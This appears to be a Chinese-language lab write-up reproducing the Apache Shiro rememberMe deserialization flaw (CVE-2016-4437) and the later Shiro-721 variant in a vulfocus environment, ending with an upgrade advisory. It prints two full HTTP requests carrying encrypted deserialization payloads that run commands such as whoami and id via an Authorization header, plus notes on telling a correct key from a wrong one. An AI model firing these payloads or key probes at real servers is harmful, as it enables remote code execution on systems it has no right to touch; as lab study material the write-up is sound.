Apache Shiro <= 1.2.4反序列化漏洞攻击 CVE-2016-4437 已亲自复现
漏洞名称
漏洞描述
在 1.2.5 之前的 Apache Shiro 中,当未为"记住我"功能配置密钥时,远程攻击者可以通过未指定的请求参数执行任意代码或绕过预期的访问限制。
影响版本
Apache Shiro <= 1.2.4
漏洞复现
环境搭建
受害者IP:127.0.0.1
攻击者IP:8.140.54.167:40201
vulfocus下载链接
bash
https://github.com/fofapro/vulfocus
git clone https://github.com/fofapro/vulfocus.git
启动vulfocus
bash
docker-compose up -d
环境启动后,访问http://8.140.54.167:40201/即可看到一个登录页面,说明已成功启动。
漏洞利用
工具下载链接:
bash
https://github.com/SummerSec/ShiroAttack2/releases/tag/4.7.0
使用工具输入目标对密钥进行爆破, 并检测利用链。
执行系统命令whoami
找了好几个工具,没找到生成payload的rememberMe的工具,启动wireshark。
使用burp试一下,payload粘进去,执行whoami,利用回显进行判断
bash
GET / HTTP/1.1
Host: 8.140.54.167:34023
Cookie: JSESSIONID=5537D28072A8ECF54A54B3A245596A12; rememberMe=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
Authorization: Basic d2hvYW1p
Connection: close
相应内容如下,经过base64解码,所以只要替换经过加密的Authorization字段可以利用回显直接使用。
bash
$$$cm9vdAo=$$$
经过base64解码
root
下面是分别对两种情况的测试,
第一种:key值如果用错了返回啥?
第二种:key用对了,但是高版本,执行不成功会返回啥?
第一种:使用正确的key值进行尝试
使用错误的key值进行尝试
发现使用正确的key值时会返回正确的Set-Cookie: JSESSIONID=和Set-Cookie: rememberMe=deleteMe; 状态码为200。
使用错误的key值会返回Set-Cookie: rememberMe=deleteMe; ,不会返回Set-Cookie: JSESSIONID=,状态码为200。
第二种:key用对了,但是高版本,执行不成功会返回啥?
这里使用vulfcous启动shiro-721漏洞进行测试,同样存在remember反序列化,但影响版本为1.2.5, 1.2.6, 1.3.0, 1.3.1, 1.3.2, 1.4.0-RC2, 1.4.0, 1.4.1。高版本进行测试。使用burp抓个包。解一下原始的remember。
爆破一下shiro721的密钥以及利用链和回显方式
执行的payload,与上面漏洞不同的是,这里使用的是post方法
bash
POST / HTTP/1.1
Cookie: rememberMe=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
Authorization: Basic aWQ=
Cookie: JSESSIONID=2a7f4e5f-1ff3-4a07-bbdd-605ea0715807
Host: 8.140.54.167:57748
Content-Length: 2
到这里思路错误,key用对了,但是高版本,执行不成功会返回啥?要解决这个问题,要找个没有漏洞的环境,继续gogogo。这里找个一个shiro-cve_2020_13933环境进行验证
经过使用正常的key值,但是高版本不存在漏洞的版本,只会返回Set-Cookie: rememberMe=deleteMe; ,不会返回Set-Cookie: JSESSIONID=。
修复建议
1、Aрасhе Shirо 多个安全漏洞的补丁--- 升级最新版本1.12.0
https://github.com/apache/shiro/releases/tag/shiro-root-1.12.0